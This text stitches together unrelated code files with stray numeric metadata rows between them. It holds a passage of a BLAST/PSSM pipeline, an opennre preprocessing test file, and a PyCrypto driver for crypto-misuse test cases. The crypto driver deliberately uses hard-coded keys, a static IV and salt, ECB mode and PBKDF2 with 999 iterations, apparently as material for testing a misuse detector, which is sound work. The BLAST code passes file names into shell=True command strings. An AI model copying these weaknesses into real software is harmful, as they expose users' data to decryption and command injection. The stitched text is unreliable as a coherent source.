    cmd = 'makeblastdb -in ' + file + ' -dbtype prot -parse_seqids -out ' + os.path.join(db_dir, out)
    subprocess.Popen(cmd, shell=True).wait()
# build the database (Windows: uses the bundled makeblastdb.exe)
def blast_makedb_windows(file, out):
    """Build a protein BLAST database named *out* (under blastDB/) from the
    FASTA file *file*, using the bundled bin/makeblastdb.exe."""
    db_dir = os.path.join(blast_path, 'blastDB')
    makedb_exe = os.path.join(os.path.join(blast_path, 'bin'), 'makeblastdb.exe')
    # NOTE(review): shell=True with string concatenation — paths containing
    # spaces will break; prefer a list argv with shell=False.
    cmd = makedb_exe + ' -in ' + file + ' -dbtype prot -parse_seqids -out ' + os.path.join(db_dir, out)
    subprocess.Popen(cmd, shell=True).wait()
# original psiblast
def blast_psiblast_linux(file, database, number, ev, out, now_path):
    """Run psiblast over every sequence file in Reads/<file>, writing PSSMs
    into PSSMs/<out> under *now_path* and printing per-file progress."""
    reads_dir = os.path.join(os.path.join(now_path, 'Reads'), file)
    db_dir = os.path.join(blast_path, 'blastDB')
    # ensure PSSMs/<out> exists
    root_pssm = os.path.join(now_path, 'PSSMs')
    if 'PSSMs' not in os.listdir(now_path):
        os.makedirs(root_pssm)
    out_path = os.path.join(root_pssm, out)
    if out not in os.listdir(root_pssm):
        os.makedirs(out_path)
    order = 0
    for entry in os.listdir(reads_dir):
        order += 1
        cmd = visual_longcommand_linux(reads_dir, entry, db_dir, database, number, ev, out_path)
        returncode = subprocess.Popen(cmd, shell=True).wait()
        if returncode == 0:
            print('\r' + str(order) + '\tCompleted\t', end='', flush=True)
        else:
            print('\r' + str(order) + '\tProblems', end='', flush=True)
    # NOTE(review): the check looks in now_path but the remove is relative to
    # the current working directory — confirm they are the same directory.
    if 'A' in os.listdir(now_path):
        os.remove('A')
# invoke psi-blast (Windows: uses the bundled psiblast.exe)
def blast_psiblast_windows(file, database, number, ev, out, now_path):
    """Run the bundled bin/psiblast.exe over every sequence file in
    Reads/<file>, writing PSSMs into PSSMs/<out> under *now_path* and
    printing per-file progress."""
    reads_dir = os.path.join(os.path.join(now_path, 'Reads'), file)
    db_dir = os.path.join(blast_path, 'blastDB')
    psiblast_exe = os.path.join(os.path.join(blast_path, 'bin'), 'psiblast.exe')
    # ensure PSSMs/<out> exists
    root_pssm = os.path.join(now_path, 'PSSMs')
    if 'PSSMs' not in os.listdir(now_path):
        os.makedirs(root_pssm)
    out_dir = os.path.join(root_pssm, out)
    if out not in os.listdir(root_pssm):
        os.makedirs(out_dir)
    order = 0
    for entry in os.listdir(reads_dir):
        order += 1
        cmd = visual_longcommand_windows(psiblast_exe, reads_dir, entry, db_dir, database, number, ev, out_dir)
        returncode = subprocess.Popen(cmd, shell=True).wait()
        if returncode == 0:
            print('\r' + str(order) + '\tCompleted\t', end='', flush=True)
        else:
            print('\r' + str(order) + '\tProblems', end='', flush=True)
    # NOTE(review): the check looks in now_path but the remove is relative to
    # the current working directory — confirm they are the same directory.
    if 'A' in os.listdir(now_path):
        os.remove('A')
# ray psiblast
def blast_rayblast_linux(folder, out, now_path):
    """Run Ray-parallelised PSI-BLAST over Reads/<folder> (Linux).

    Input files are dispatched to Ray_blast.py in batches of 20; each batch
    is described by a '<folder>_<k>' manifest ('input@@output' per line).

    Args:
        folder: sub-directory of <now_path>/Reads holding the sequence files.
        out: sub-directory of <now_path>/PSSMs that receives the PSSM output.
        now_path: project working directory.
    """
    reads_path = os.path.join(now_path, 'Reads', folder)
    pssm_path = os.path.join(os.path.join(now_path, 'PSSMs'), out)
    os.makedirs(pssm_path, exist_ok=True)  # hoisted out of the loop
    batch_size = 20
    file_box, out_box = [], []
    file_mid, out_mid = [], []
    for f in os.listdir(reads_path):
        # BUG FIX: the original's else-branch reset the batch *instead of*
        # adding the triggering file, silently dropping every 21st sequence,
        # and it never flushed the final partial batch (the Windows variant
        # did flush it).
        if len(file_mid) == batch_size:
            file_box.append(file_mid)
            out_box.append(out_mid)
            file_mid, out_mid = [], []
        file_mid.append(os.path.join(reads_path, f))
        out_mid.append(os.path.join(pssm_path, f.split('.')[0]))
    if file_mid:
        file_box.append(file_mid)
        out_box.append(out_mid)
    start = time.time()
    for k in range(len(file_box)):
        manifest = ''.join(i + '@@' + o + '\n' for i, o in zip(file_box[k], out_box[k]))
        file_name = os.path.join(now_path, folder) + '_' + str(k)
        if folder + '_' + str(k) not in os.listdir(now_path):
            print(file_name)
            with open(file_name, 'w', encoding='UTF-8') as fh:
                fh.write(manifest)
            # NOTE(review): resolved relative to the CWD, unlike the '_sup'
            # variant which prefixes os.path.join('pyrpct', ...) — confirm.
            command = 'python Ray_blast.py ' + file_name
            subprocess.Popen(command, shell=True).communicate()
    # BUG FIX: remove the stray 'A' inside now_path (not a CWD-relative 'A').
    stray = os.path.join(now_path, 'A')
    if os.path.exists(stray):
        os.remove(stray)
    print("共计用时: {}s".format(time.time() - start))
def blast_rayblast_windows(folder, out, now_path):
    """Run Ray-parallelised PSI-BLAST over Reads/<folder> (Windows).

    Input files are dispatched to Ray_blast_win.py in batches of 20; each
    batch is described by a '<folder>_<k>' manifest ('input@@output' per line).

    Args:
        folder: sub-directory of <now_path>/Reads holding the sequence files.
        out: sub-directory of <now_path>/PSSMs that receives the PSSM output.
        now_path: project working directory.
    """
    reads_path = os.path.join(now_path, 'Reads', folder)
    pssm_path = os.path.join(os.path.join(now_path, 'PSSMs'), out)
    os.makedirs(pssm_path, exist_ok=True)  # hoisted out of the loop
    batch_size = 20
    file_box, out_box = [], []
    file_mid, out_mid = [], []
    for f in os.listdir(reads_path):
        # BUG FIX: the original's else-branch reset the batch *instead of*
        # adding the triggering file, silently dropping every 21st sequence.
        if len(file_mid) == batch_size:
            file_box.append(file_mid)
            out_box.append(out_mid)
            file_mid, out_mid = [], []
        file_mid.append(os.path.join(reads_path, f))
        out_mid.append(os.path.join(pssm_path, f.split('.')[0]))
    # Flush the final partial batch only when it is non-empty (the original
    # could append an empty batch and spawn Ray on an empty manifest).
    if file_mid:
        file_box.append(file_mid)
        out_box.append(out_mid)
    start = time.time()
    for k in range(len(file_box)):
        manifest = ''.join(i + '@@' + o + '\n' for i, o in zip(file_box[k], out_box[k]))
        file_name = os.path.join(now_path, folder) + '_' + str(k)
        if folder + '_' + str(k) not in os.listdir(now_path):
            print(file_name)
            with open(file_name, 'w', encoding='UTF-8') as fh:
                fh.write(manifest)
            ray_command = os.path.join('pyrpct', 'Ray_blast_win.py')
            command = 'python ' + ray_command + ' ' + file_name
            subprocess.Popen(command, shell=True).communicate()
    # BUG FIX: remove the stray 'A' inside now_path (not a CWD-relative 'A').
    stray = os.path.join(now_path, 'A')
    if os.path.exists(stray):
        os.remove(stray)
    print("共计用时: {}s".format(time.time() - start))
# ray supplement
def blast_raysup_linux(folder, out, now_path):
    """Supplement pass (Linux): PSI-BLAST only the sequences whose PSSM is missing.

    Args:
        folder: sub-directory of <now_path>/Reads holding the sequence files.
        out: sub-directory of <now_path>/PSSMs that receives the PSSM output.
        now_path: project working directory.
    """
    reads_path = os.path.join(now_path, 'Reads', folder)
    pssm_path = os.path.join(os.path.join(now_path, 'PSSMs'), out)
    os.makedirs(pssm_path, exist_ok=True)  # hoisted out of the loop
    # Snapshot existing outputs once; the loop only reads, so this is safe
    # and avoids an O(n) listdir per input file.
    existing = set(os.listdir(pssm_path))
    file_box, out_box = [], []
    for f in os.listdir(reads_path):
        if f.split('.')[0] not in existing:
            file_box.append(os.path.join(reads_path, f))
            out_box.append(os.path.join(pssm_path, f.split('.')[0]))
    start = time.time()
    out_file = ''.join(i + '@@' + o + '\n' for i, o in zip(file_box, out_box))
    file_name = os.path.join(now_path, folder) + '_sup'
    if folder + '_sup' not in os.listdir(now_path):
        print(file_name)
        with open(file_name, 'w', encoding='UTF-8') as fh:
            fh.write(out_file)
        ray_command = os.path.join('pyrpct', 'Ray_blast.py')
        command = 'python ' + ray_command + ' ' + file_name
        subprocess.Popen(command, shell=True).communicate()
    # BUG FIX: remove the stray 'A' inside now_path (not a CWD-relative 'A').
    stray = os.path.join(now_path, 'A')
    if os.path.exists(stray):
        os.remove(stray)
    print("共计用时: {}s".format(time.time() - start))
def blast_raysup_windows(folder, out, now_path):
    """Supplement pass (Windows): PSI-BLAST only the sequences whose PSSM is missing.

    Args:
        folder: sub-directory of <now_path>/Reads holding the sequence files.
        out: sub-directory of <now_path>/PSSMs that receives the PSSM output.
        now_path: project working directory.
    """
    reads_path = os.path.join(now_path, 'Reads', folder)
    pssm_path = os.path.join(os.path.join(now_path, 'PSSMs'), out)
    os.makedirs(pssm_path, exist_ok=True)  # hoisted out of the loop
    # Snapshot existing outputs once; the loop only reads, so this is safe
    # and avoids an O(n) listdir per input file.
    existing = set(os.listdir(pssm_path))
    file_box, out_box = [], []
    for f in os.listdir(reads_path):
        if f.split('.')[0] not in existing:
            file_box.append(os.path.join(reads_path, f))
            out_box.append(os.path.join(pssm_path, f.split('.')[0]))
    start = time.time()
    out_file = ''.join(i + '@@' + o + '\n' for i, o in zip(file_box, out_box))
    file_name = os.path.join(now_path, folder) + '_sup'
    if folder + '_sup' not in os.listdir(now_path):
        print(file_name)
        with open(file_name, 'w', encoding='UTF-8') as fh:
            fh.write(out_file)
        ray_command = os.path.join('pyrpct', 'Ray_blast_win.py')
        command = 'python ' + ray_command + ' ' + file_name
        subprocess.Popen(command, shell=True).communicate()
    # BUG FIX: remove the stray 'A' inside now_path (not a CWD-relative 'A').
    stray = os.path.join(now_path, 'A')
    if os.path.exists(stray):
        os.remove(stray)
    print("共计用时: {}s".format(time.time() - start))
| 39.526786
| 116
| 0.575446
| 1,267
| 8,854
| 3.840568
| 0.081294
| 0.081381
| 0.13358
| 0.069462
| 0.902384
| 0.902384
| 0.902384
| 0.88882
| 0.887587
| 0.86827
| 0
| 0.004037
| 0.272532
| 8,854
| 223
| 117
| 39.704036
| 0.751436
| 0.010617
| 0
| 0.885
| 0
| 0
| 0.063548
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04
| false
| 0.02
| 0.02
| 0
| 0.06
| 0.06
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b5b4935854cfe03210802bec9167b8d90507a354
| 1,949
|
py
|
Python
|
opennre/tests/preprocess/test_preprocess.py
|
igorvlnascimento/DeepREF
|
0fed8120571e44e12ee3d1861289bc101c0a275f
|
[
"MIT"
] | null | null | null |
opennre/tests/preprocess/test_preprocess.py
|
igorvlnascimento/DeepREF
|
0fed8120571e44e12ee3d1861289bc101c0a275f
|
[
"MIT"
] | null | null | null |
opennre/tests/preprocess/test_preprocess.py
|
igorvlnascimento/DeepREF
|
0fed8120571e44e12ee3d1861289bc101c0a275f
|
[
"MIT"
] | null | null | null |
import os
from opennre.dataset.preprocess_dataset import PreprocessDataset
def test_should_return_sw_eb_preprocessed_file_ddi():
    """Preprocess ddi with ["sw", "eb"] and verify the output file exists."""
    p = PreprocessDataset("ddi", ["sw", "eb"])
    p.preprocess_dataset()
    # NOTE(review): the original asserted the identical *_test_* path three
    # times; the triplicate suggests the train/val/test splits were intended —
    # confirm against PreprocessDataset's outputs before adding them.
    assert os.path.exists("benchmark/ddi/eb_sw/ddi_test_eb_sw.txt")
def test_should_return_b_d_preprocessed_file_ddi():
    """Preprocess ddi with ["b", "d"] and verify the output file exists."""
    p = PreprocessDataset("ddi", ["b", "d"])
    p.preprocess_dataset()
    # NOTE(review): the original asserted the identical *_test_* path three
    # times; the triplicate suggests the train/val/test splits were intended —
    # confirm against PreprocessDataset's outputs before adding them.
    assert os.path.exists("benchmark/ddi/b_d/ddi_test_b_d.txt")
def test_should_return_sw_eb_preprocessed_file_semeval2010():
    """Preprocess semeval2010 with ["sw", "eb"] and verify the output file exists."""
    p = PreprocessDataset("semeval2010", ["sw", "eb"])
    p.preprocess_dataset()
    # NOTE(review): the original asserted the identical *_test_* path three
    # times; the triplicate suggests the train/val/test splits were intended —
    # confirm against PreprocessDataset's outputs before adding them.
    assert os.path.exists("benchmark/semeval2010/eb_sw/semeval2010_test_eb_sw.txt")
def test_should_return_b_d_preprocessed_file_semeval20181():
    """Preprocess semeval20181-1 with ["b", "d"] and verify the output file exists."""
    p = PreprocessDataset("semeval20181-1", ["b", "d"])
    p.preprocess_dataset()
    # NOTE(review): the original asserted the identical *_test_* path three
    # times; the triplicate suggests the train/val/test splits were intended —
    # confirm against PreprocessDataset's outputs before adding them.
    assert os.path.exists("benchmark/semeval20181-1/b_d/semeval20181-1_test_b_d.txt")
def test_should_return_b_d_preprocessed_file_semeval20182():
    """Preprocess semeval20181-2 with ["b", "d"] and verify the output file exists."""
    p = PreprocessDataset("semeval20181-2", ["b", "d"])
    p.preprocess_dataset()
    # NOTE(review): the original asserted the identical *_test_* path three
    # times; the triplicate suggests the train/val/test splits were intended —
    # confirm against PreprocessDataset's outputs before adding them.
    assert os.path.exists("benchmark/semeval20181-2/b_d/semeval20181-2_test_b_d.txt")
| 49.974359
| 85
| 0.762442
| 303
| 1,949
| 4.570957
| 0.09571
| 0.034657
| 0.129964
| 0.194946
| 0.861372
| 0.861372
| 0.826715
| 0.826715
| 0.770397
| 0.743682
| 0
| 0.072124
| 0.103643
| 1,949
| 39
| 86
| 49.974359
| 0.720664
| 0
| 0
| 0.625
| 0
| 0
| 0.39641
| 0.366154
| 0
| 0
| 0
| 0
| 0.46875
| 1
| 0.15625
| false
| 0
| 0.0625
| 0
| 0.21875
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
a99c6be9eb60780712e75faebfbd77806fa2ff5c
| 20,191
|
py
|
Python
|
resources/test_cases/python/PyCrypto/python-code-testc.py
|
stg-tud/licma
|
b899e6e682f7716d19e79d6ce7b73c28c6efd4cf
|
[
"MIT"
] | 5
|
2021-09-13T11:24:13.000Z
|
2022-03-18T21:56:58.000Z
|
resources/test_cases/python/PyCrypto/python-code-testc.py
|
stg-tud/licma
|
b899e6e682f7716d19e79d6ce7b73c28c6efd4cf
|
[
"MIT"
] | null | null | null |
resources/test_cases/python/PyCrypto/python-code-testc.py
|
stg-tud/licma
|
b899e6e682f7716d19e79d6ce7b73c28c6efd4cf
|
[
"MIT"
] | 1
|
2021-09-13T06:02:20.000Z
|
2021-09-13T06:02:20.000Z
|
from Crypto.Cipher import AES
from Crypto.Protocol.KDF import PBKDF2
from TestRule1c import TestRule1c
from TestRule2c import TestRule2c
from TestRule3c import TestRule3c
from TestRule4c import TestRule4c
from TestRule5c import TestRule5c
# Shared fixtures: deliberately weak, hard-coded crypto material that drives
# the positive ("p_") and negative ("n_") rule examples exercised in __main__.
g_key = b"1234567812345678"  # 16-byte AES-128 key
g_iv = b"1234567812345678"  # 16-byte CBC initialisation vector
g_password = "12345678"
g_salt = b"12345678"
g_count_lower_1000 = 999  # PBKDF2 iteration count just below the 1000 threshold
g_count_equal_1000 = 1000  # PBKDF2 iteration count exactly at the threshold
g_plaintext = b"abcdefghijklmnop"  # exactly one AES block (16 bytes)
g_mode = AES.MODE_ECB
def decrypt_aes_ecb(key, data):
    """Decrypt *data* with AES in ECB mode under *key*; return the plaintext bytes."""
    return AES.new(key, AES.MODE_ECB).decrypt(data)
def decrypt_aes_cbc(key, iv, data):
    """Decrypt *data* with AES in CBC mode under *key*/*iv*; return the plaintext bytes."""
    return AES.new(key, AES.MODE_CBC, iv).decrypt(data)
def get_pbk(salt, count):
    """Derive a 16-byte key from the module-level password via PBKDF2."""
    derived_key = PBKDF2(g_password, salt, 16, count=count)
    return derived_key
# Smoke-test driver: exercises every positive ("p_") and negative ("n_")
# example of each misuse rule and prints True when the decrypted result
# round-trips back to the known plaintext.
if __name__ == '__main__':
    # TestRule1c code — rule 1: ECB mode misuse (hard-coded/derivable key paths)
    testRule1c = TestRule1c()
    print("PyCrypto -> rule1 -> p_example1_hard_coded1:",
          decrypt_aes_ecb(g_key, testRule1c.p_example1_hard_coded1(g_key, g_plaintext)) == g_plaintext)
    print("PyCrypto -> rule1 -> p_example2_hard_coded2:",
          decrypt_aes_ecb(g_key, testRule1c.p_example2_hard_coded2(g_key, g_plaintext)) == g_plaintext)
    print("PyCrypto -> rule1 -> p_example3_local_variable1:",
          decrypt_aes_ecb(g_key, testRule1c.p_example3_local_variable1(g_key, g_plaintext)) == g_plaintext)
    print("PyCrypto -> rule1 -> p_example4_local_variable2:",
          decrypt_aes_ecb(g_key, testRule1c.p_example4_local_variable2(g_key, g_plaintext)) == g_plaintext)
    print("PyCrypto -> rule1 -> p_example5_nested_local_variable1:",
          decrypt_aes_ecb(g_key, testRule1c.p_example5_nested_local_variable1(g_key, g_plaintext)) == g_plaintext)
    print("PyCrypto -> rule1 -> p_example6_nested_local_variable2:",
          decrypt_aes_ecb(g_key, testRule1c.p_example6_nested_local_variable2(g_key, g_plaintext)) == g_plaintext)
    print("PyCrypto -> rule1 -> p_example7_direct_method_call1:",
          decrypt_aes_ecb(g_key, testRule1c.p_example7_direct_method_call1(g_key, g_plaintext)) == g_plaintext)
    print("PyCrypto -> rule1 -> p_example8_direct_method_call2:",
          decrypt_aes_ecb(g_key, testRule1c.p_example8_direct_method_call2(g_key, g_plaintext)) == g_plaintext)
    print("PyCrypto -> rule1 -> p_example9_nested_method_call1:",
          decrypt_aes_ecb(g_key, testRule1c.p_example9_nested_method_call1(g_key, g_plaintext)) == g_plaintext)
    print("PyCrypto -> rule1 -> p_example10_nested_method_call2:",
          decrypt_aes_ecb(g_key, testRule1c.p_example10_nested_method_call2(g_key, g_plaintext)) == g_plaintext)
    print("PyCrypto -> rule1 -> p_example11_direct_g_variable_access1:",
          decrypt_aes_ecb(g_key, testRule1c.p_example11_direct_g_variable_access1(g_key, g_plaintext)) == g_plaintext)
    print("PyCrypto -> rule1 -> p_example12_direct_g_variable_access2:",
          decrypt_aes_ecb(g_key, testRule1c.p_example12_direct_g_variable_access2(g_key, g_plaintext)) == g_plaintext)
    print("PyCrypto -> rule1 -> p_example13_indirect_g_variable_access1:",
          decrypt_aes_ecb(g_key, testRule1c.p_example13_indirect_g_variable_access1(g_key, g_plaintext)) == g_plaintext)
    print("PyCrypto -> rule1 -> p_example14_indirect_g_variable_access2:",
          decrypt_aes_ecb(g_key, testRule1c.p_example14_indirect_g_variable_access2(g_key, g_plaintext)) == g_plaintext)
    print("PyCrypto -> rule1 -> p_example15_warning_parameter_not_resolvable:", decrypt_aes_ecb(g_key,
          testRule1c.p_example15_warning_parameter_not_resolvable(
              g_key, g_plaintext,
              g_mode)) == g_plaintext)
    print("PyCrypto -> rule1 -> n_example1_cbc:", testRule1c.n_example1_cbc(g_key, g_iv, g_plaintext))
    # TestRule2c code — rule 2: static/predictable IV misuse
    testRule2c = TestRule2c()
    print("PyCrypto -> rule2 -> p_example1_hard_coded1:",
          decrypt_aes_cbc(g_key, g_iv, testRule2c.p_example1_hard_coded1(g_key, g_plaintext)) == g_plaintext)
    print("PyCrypto -> rule2 -> p_example2_hard_coded2:",
          decrypt_aes_cbc(g_key, g_iv, testRule2c.p_example2_hard_coded2(g_key, g_plaintext)) == g_plaintext)
    print("PyCrypto -> rule2 -> p_example3_local_variable1:",
          decrypt_aes_cbc(g_key, g_iv, testRule2c.p_example3_local_variable1(g_key, g_plaintext)) == g_plaintext)
    print("PyCrypto -> rule2 -> p_example4_local_variable2:",
          decrypt_aes_cbc(g_key, g_iv, testRule2c.p_example4_local_variable2(g_key, g_plaintext)) == g_plaintext)
    print("PyCrypto -> rule2 -> p_example5_nested_local_variable1:",
          decrypt_aes_cbc(g_key, g_iv, testRule2c.p_example5_nested_local_variable1(g_key, g_plaintext)) == g_plaintext)
    print("PyCrypto -> rule2 -> p_example6_nested_local_variable2:",
          decrypt_aes_cbc(g_key, g_iv, testRule2c.p_example6_nested_local_variable2(g_key, g_plaintext)) == g_plaintext)
    print("PyCrypto -> rule2 -> p_example7_direct_method_call1:",
          decrypt_aes_cbc(g_key, g_iv, testRule2c.p_example7_direct_method_call1(g_key, g_plaintext)) == g_plaintext)
    print("PyCrypto -> rule2 -> p_example8_direct_method_call2:",
          decrypt_aes_cbc(g_key, g_iv, testRule2c.p_example8_direct_method_call2(g_key, g_plaintext)) == g_plaintext)
    print("PyCrypto -> rule2 -> p_example9_nested_method_call1:",
          decrypt_aes_cbc(g_key, g_iv, testRule2c.p_example9_nested_method_call1(g_key, g_plaintext)) == g_plaintext)
    print("PyCrypto -> rule2 -> p_example10_nested_method_call2:",
          decrypt_aes_cbc(g_key, g_iv, testRule2c.p_example10_nested_method_call2(g_key, g_plaintext)) == g_plaintext)
    print("PyCrypto -> rule2 -> p_example11_direct_g_variable_access1:", decrypt_aes_cbc(g_key, g_iv,
          testRule2c.p_example11_direct_g_variable_access1(
              g_key,
              g_plaintext)) == g_plaintext)
    print("PyCrypto -> rule2 -> p_example12_direct_g_variable_access2:", decrypt_aes_cbc(g_key, g_iv,
          testRule2c.p_example12_direct_g_variable_access2(
              g_key,
              g_plaintext)) == g_plaintext)
    print("PyCrypto -> rule2 -> p_example13_indirect_g_variable_access1:", decrypt_aes_cbc(g_key, g_iv,
          testRule2c.p_example13_indirect_g_variable_access1(
              g_key,
              g_plaintext)) == g_plaintext)
    print("PyCrypto -> rule2 -> p_example14_indirect_g_variable_access2:", decrypt_aes_cbc(g_key, g_iv,
          testRule2c.p_example14_indirect_g_variable_access2(
              g_key,
              g_plaintext)) == g_plaintext)
    print("PyCrypto -> rule2 -> p_example15_warning_parameter_not_resolvable:", decrypt_aes_cbc(g_key, g_iv,
          testRule2c.p_example15_warning_parameter_not_resolvable(
              g_key, g_iv,
              g_plaintext)) == g_plaintext)
    print("PyCrypto -> rule2 -> n_example1_secrets_system_random:",
          testRule2c.n_example1_secrets_system_random(g_key, g_plaintext))
    # TestRule3c code — rule 3: constant key misuse (key generated inside callee)
    testRule3c = TestRule3c()
    print("PyCrypto -> rule3 -> p_example1_hard_coded1:",
          decrypt_aes_ecb(g_key, testRule3c.p_example1_hard_coded1(g_plaintext)) == g_plaintext)
    print("PyCrypto -> rule3 -> p_example2_hard_coded2:",
          decrypt_aes_ecb(g_key, testRule3c.p_example2_hard_coded2(g_plaintext)) == g_plaintext)
    print("PyCrypto -> rule3 -> p_example3_local_variable1:",
          decrypt_aes_ecb(g_key, testRule3c.p_example3_local_variable1(g_plaintext)) == g_plaintext)
    print("PyCrypto -> rule3 -> p_example4_local_variable2:",
          decrypt_aes_ecb(g_key, testRule3c.p_example4_local_variable2(g_plaintext)) == g_plaintext)
    print("PyCrypto -> rule3 -> p_example5_nested_local_variable1:",
          decrypt_aes_ecb(g_key, testRule3c.p_example5_nested_local_variable1(g_plaintext)) == g_plaintext)
    print("PyCrypto -> rule3 -> p_example6_nested_local_variable2:",
          decrypt_aes_ecb(g_key, testRule3c.p_example6_nested_local_variable2(g_plaintext)) == g_plaintext)
    print("PyCrypto -> rule3 -> p_example7_direct_method_call1:",
          decrypt_aes_ecb(g_key, testRule3c.p_example7_direct_method_call1(g_plaintext)) == g_plaintext)
    print("PyCrypto -> rule3 -> p_example8_direct_method_call2:",
          decrypt_aes_ecb(g_key, testRule3c.p_example8_direct_method_call2(g_plaintext)) == g_plaintext)
    print("PyCrypto -> rule3 -> p_example9_nested_method_call1:",
          decrypt_aes_ecb(g_key, testRule3c.p_example9_nested_method_call1(g_plaintext)) == g_plaintext)
    print("PyCrypto -> rule3 -> p_example10_nested_method_call2:",
          decrypt_aes_ecb(g_key, testRule3c.p_example10_nested_method_call2(g_plaintext)) == g_plaintext)
    print("PyCrypto -> rule3 -> p_example11_direct_g_variable_access1:",
          decrypt_aes_ecb(g_key, testRule3c.p_example11_direct_g_variable_access1(g_plaintext)) == g_plaintext)
    print("PyCrypto -> rule3 -> p_example12_direct_g_variable_access2:",
          decrypt_aes_ecb(g_key, testRule3c.p_example12_direct_g_variable_access2(g_plaintext)) == g_plaintext)
    print("PyCrypto -> rule3 -> p_example13_indirect_g_variable_access1:",
          decrypt_aes_ecb(g_key, testRule3c.p_example13_indirect_g_variable_access1(g_plaintext)) == g_plaintext)
    print("PyCrypto -> rule3 -> p_example14_indirect_g_variable_access2:",
          decrypt_aes_ecb(g_key, testRule3c.p_example14_indirect_g_variable_access2(g_plaintext)) == g_plaintext)
    print("PyCrypto -> rule3 -> p_example15_warning_parameter_not_resolvable:", decrypt_aes_ecb(g_key,
          testRule3c.p_example15_warning_parameter_not_resolvable(
              g_key,
              g_plaintext)) == g_plaintext)
    print("PyCrypto -> rule3 -> n_example1_random_key:", testRule3c.n_example1_random_key(g_plaintext))
    # TestRule4c code — rule 4: static salt misuse (PBKDF2-derived keys)
    testRule4c = TestRule4c()
    print("PyCrypto -> rule4 -> p_example1_hard_coded1:", decrypt_aes_ecb(get_pbk(g_salt, g_count_equal_1000),
          testRule4c.p_example1_hard_coded1(g_password,
                                            g_plaintext)) == g_plaintext)
    print("PyCrypto -> rule4 -> p_example2_hard_coded2:", decrypt_aes_ecb(get_pbk(g_salt, g_count_equal_1000),
          testRule4c.p_example2_hard_coded2(g_password,
                                            g_plaintext)) == g_plaintext)
    print("PyCrypto -> rule4 -> p_example3_local_variable1:", decrypt_aes_ecb(get_pbk(g_salt, g_count_equal_1000),
          testRule4c.p_example3_local_variable1(
              g_password,
              g_plaintext)) == g_plaintext)
    print("PyCrypto -> rule4 -> p_example4_local_variable2:", decrypt_aes_ecb(get_pbk(g_salt, g_count_equal_1000),
          testRule4c.p_example4_local_variable2(
              g_password,
              g_plaintext)) == g_plaintext)
    print("PyCrypto -> rule4 -> p_example5_nested_local_variable1:",
          decrypt_aes_ecb(get_pbk(g_salt, g_count_equal_1000),
                          testRule4c.p_example5_nested_local_variable1(g_password, g_plaintext)) == g_plaintext)
    print("PyCrypto -> rule4 -> p_example6_nested_local_variable2:",
          decrypt_aes_ecb(get_pbk(g_salt, g_count_equal_1000),
                          testRule4c.p_example6_nested_local_variable2(g_password, g_plaintext)) == g_plaintext)
    print("PyCrypto -> rule4 -> p_example7_direct_method_call1:", decrypt_aes_ecb(get_pbk(g_salt, g_count_equal_1000),
          testRule4c.p_example7_direct_method_call1(
              g_password,
              g_plaintext)) == g_plaintext)
    print("PyCrypto -> rule4 -> p_example8_direct_method_call2:", decrypt_aes_ecb(get_pbk(g_salt, g_count_equal_1000),
          testRule4c.p_example8_direct_method_call2(
              g_password,
              g_plaintext)) == g_plaintext)
    print("PyCrypto -> rule4 -> p_example9_nested_method_call1:", decrypt_aes_ecb(get_pbk(g_salt, g_count_equal_1000),
          testRule4c.p_example9_nested_method_call1(
              g_password,
              g_plaintext)) == g_plaintext)
    print("PyCrypto -> rule4 -> p_example10_nested_method_call2:", decrypt_aes_ecb(get_pbk(g_salt, g_count_equal_1000),
          testRule4c.p_example10_nested_method_call2(
              g_password,
              g_plaintext)) == g_plaintext)
    print("PyCrypto -> rule4 -> p_example11_direct_g_variable_access1:",
          decrypt_aes_ecb(get_pbk(g_salt, g_count_equal_1000),
                          testRule4c.p_example11_direct_g_variable_access1(g_password, g_plaintext)) == g_plaintext)
    print("PyCrypto -> rule4 -> p_example12_direct_g_variable_access2:",
          decrypt_aes_ecb(get_pbk(g_salt, g_count_equal_1000),
                          testRule4c.p_example12_direct_g_variable_access2(g_password, g_plaintext)) == g_plaintext)
    print("PyCrypto -> rule4 -> p_example13_indirect_g_variable_access1:",
          decrypt_aes_ecb(get_pbk(g_salt, g_count_equal_1000),
                          testRule4c.p_example13_indirect_g_variable_access1(g_password, g_plaintext)) == g_plaintext)
    print("PyCrypto -> rule4 -> p_example14_indirect_g_variable_access2:",
          decrypt_aes_ecb(get_pbk(g_salt, g_count_equal_1000),
                          testRule4c.p_example14_indirect_g_variable_access2(g_password, g_plaintext)) == g_plaintext)
    print("PyCrypto -> rule4 -> p_example15_warning_parameter_not_resolvable:",
          decrypt_aes_ecb(get_pbk(g_salt, g_count_equal_1000),
                          testRule4c.p_example15_warning_parameter_not_resolvable(g_password, g_salt,
                                                                                  g_plaintext)) == g_plaintext)
    print("PyCrypto -> rule4 -> n_example1_random_salt:", testRule4c.n_example1_random_salt(g_password, g_plaintext))
    # TestRule5c code — rule 5: PBKDF2 iteration count below 1000
    testRule5c = TestRule5c()
    # NOTE(review): label says "p_example1_hard_coded1" but the method called
    # is p_example1_hard_coded — the trailing '1' in the label looks like a
    # copy/paste slip from the rule1-4 sections; confirm before changing.
    print("PyCrypto -> rule5 -> p_example1_hard_coded1:", decrypt_aes_ecb(get_pbk(g_salt, g_count_lower_1000),
          testRule5c.p_example1_hard_coded(g_password,
                                           g_plaintext)) == g_plaintext)
    print("PyCrypto -> rule5 -> p_example2_local_variable:", decrypt_aes_ecb(get_pbk(g_salt, g_count_lower_1000),
          testRule5c.p_example2_local_variable(
              g_password,
              g_plaintext)) == g_plaintext)
    print("PyCrypto -> rule5 -> p_example3_nested_local_variable:", decrypt_aes_ecb(get_pbk(g_salt, g_count_lower_1000),
          testRule5c.p_example3_nested_local_variable(
              g_password,
              g_plaintext)) == g_plaintext)
    print("PyCrypto -> rule5 -> p_example4_direct_method_call:", decrypt_aes_ecb(get_pbk(g_salt, g_count_lower_1000),
          testRule5c.p_example4_direct_method_call(
              g_password,
              g_plaintext)) == g_plaintext)
